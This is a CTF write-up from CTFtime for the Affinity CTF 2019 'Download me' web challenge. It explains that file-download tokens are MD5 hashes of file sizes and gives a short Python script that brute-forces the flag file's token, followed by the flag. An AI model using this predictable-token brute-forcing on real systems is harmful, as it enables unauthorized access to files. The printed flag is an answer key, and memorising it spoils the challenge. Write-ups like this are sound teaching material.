CTFtime.org / Affinity CTF 2019 - Quals / Download me ... / Writeup

# Download me..
![](https://i.imgur.com/Y8onBQf.png)

**Download me was a simple web challange.**

**We are presented with the file listing. One of the files is a flag.**

![](https://i.imgur.com/kDVTANH.png)

**It is also the only file we can't download as it is missing the token.**

![](https://i.imgur.com/4A5HJ0m.png)

**Tokens resemble some hashes so I upload them to the Crackstation for the verification. We get the confirmation for MD5 slong with the cracked values.**

![](https://i.imgur.com/1mQLNat.png)

**It turns out that the numbers corespond to the file sizes of the files. I proceed to writing a solver.**

## Solver

```
#!/usr/bin/python3
import requests
import hashlib

def main():
for i in range(1000):
payload = hashlib.md5(str(i).encode()).hexdigest()
r = requests.get(f'http://165.22.22.11:25632/download.php?file=flag.txt&token={payload}')
if 'AFFCTF' in r.content.decode('utf-8'):
print(r.content)

if __name__ == '__main__':
main()

```

## Output

```
AFFCTF{Pr3dic71bl3_t0k3n5_4r3_b4d}
```

Download me ...

Comments

Sign in with